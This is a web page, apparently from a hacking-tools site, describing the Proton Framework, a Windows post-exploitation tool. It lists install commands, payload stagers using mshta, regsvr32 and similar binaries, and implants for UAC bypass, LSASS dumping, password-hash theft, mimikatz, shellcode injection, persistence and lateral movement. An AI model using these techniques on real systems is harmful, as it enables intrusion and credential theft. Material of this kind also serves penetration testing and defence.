Proton Framework - A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework

Proton Framework – A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework

About Proton Framework

Proton Framework is a Windows post exploitation framework similar to other penetration 
testing tools such as Meterpreter and Powershell Invader Framework. The major difference is that
the Proton Framework does most of its operations using Windows Script Host (a.k.a. JScript/VBScript),
with compatibility in the core to support a default installation of Windows 2000 with no service
packs (and potentially even versions of NT4) all the way through Windows 10.


Getting started

Proton installation

cd proton

chmod +x install.sh

./install.sh

Proton uninstallation

cd proton

chmod +x uninstall.sh

./uninstall.sh

Proton Framework execution

To execute Proton Framework you 
should execute the following command.

proton

Proton Framework modules

There are to kinds of Proton Framework modules - 
stagers and implants. Proton stagers hook target
zombies and allow you to use implants. Proton
implants starts jobs on remote target zombie.

Proton Framework stagers

Proton Framework stagers hook target 
zombie and allow you to use implants.
NameDescription
mshtaServes payloads using mshta.exe.
regsvrServes payloads using regsvr32.exe.
rundllServes payloads using rundll32.exe.
diskServes payloads using files on disk.
bitsServes payloads using BitsAdmin.
wmicServes payloads using WMIC XSL.

Proton Framework implants

Proton Framework implants starts 
jobs on a remote zombie target.
NameDescription
bypassuac_compdefaultsBypass UAC via registry hijack for ComputerDefaults.exe.
bypassuac_compmgmtlauncherBypass UAC via registry hijack for CompMgmtLauncher.exe.
bypassuac_eventvwrUses eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
bypassuac_fodhelperBypass UAC via registry hijack for fodhelper.exe.
bypassuac_sdcltUses sdclt.exe exploit to bypass UAC on Windows 10.
bypassuac_sluiBypass UAC via registry hijack for slui.exe.
system_createserviceElevate from administrative session to SYSTEM via SC.exe.
youtubeMaxes volume and opens the specified YouTube video in a hidden window.
voicePlays a message over text-to-speech.
clipboardRetrieves the current content of the user clipboard.
comsvcs_lsassUtilizes comsvcs.dll to create a MiniDump of LSASS, parses with pypykatz.
enum_domain_infoRetrieve information about the Windows domain.
hashdump_dcDomain controller hashes from the NTDS.dit file.
hashdump_samRetrieves hashed passwords from the SAM hive.
loot_finderFinds loot on the target machine.
user_hunterLocate users logged on to domain computers (using Dynamic Wrapper X).
mimikatz_dotnetInjects a reflective-loaded DLL to run powerkatz.dll.
mimikatz_dynwrapxInjects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
mimikatz_tashlibExecutes arbitrary shellcode using the TashLib COM object.
shellcode_dotnetExecutes arbitrary shellcode using the DotNet2JS technique. Inject shellcode into a host process via createremotethread as a new thread.
shellcode_dynwrapxExecutes arbitrary shellcode using the Dynamic Wrapper X COM object.
shellcode_excelRuns arbitrary shellcode payload (if Excel is installed).
enable_rdesktopEnables remote desktop on the target.
exec_cmdRun an arbitrary command on the target, and optionally receive the output.
add_userAdds a either a local or domain user.
registryAdds a Proton stager payload in the registry.
schtasksEstablishes persistence via a scheduled task.
wmiCreates persistence using a WMI subscription.
password_boxPrompt a user to enter their password.
exec_psexecRun a command on another machine using psexec from sysinternals.
exec_wmiExecutes a command on another system.
stage_wmiHook a zombie on another machine using WMI.
tcpUses HTTP to scan open TCP ports on the target zombie LAN.
download_fileDownloads a file from the target zombie.
multi_moduleRun a number of implants in succession.
upload_fileUploads a file from the listening server to the target zombies.

TLS communications

INFO: To enable TLS communications, you will need 
to host your Proton stager on a valid domain
(i.e. malicious.com) with a known Root CA signed
certificate. Windows will check its certificate
store and will NOT allow a self-signed certificate.

Proton Framework disclaimer

Usage of the Proton Framework for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Leave a Reply

Your email address will not be published. Required fields are marked *

Special Offer for Hackers!Sign up to get your $5 Coupon code, weekly deals and latest hacking tools straight to your inbox!
X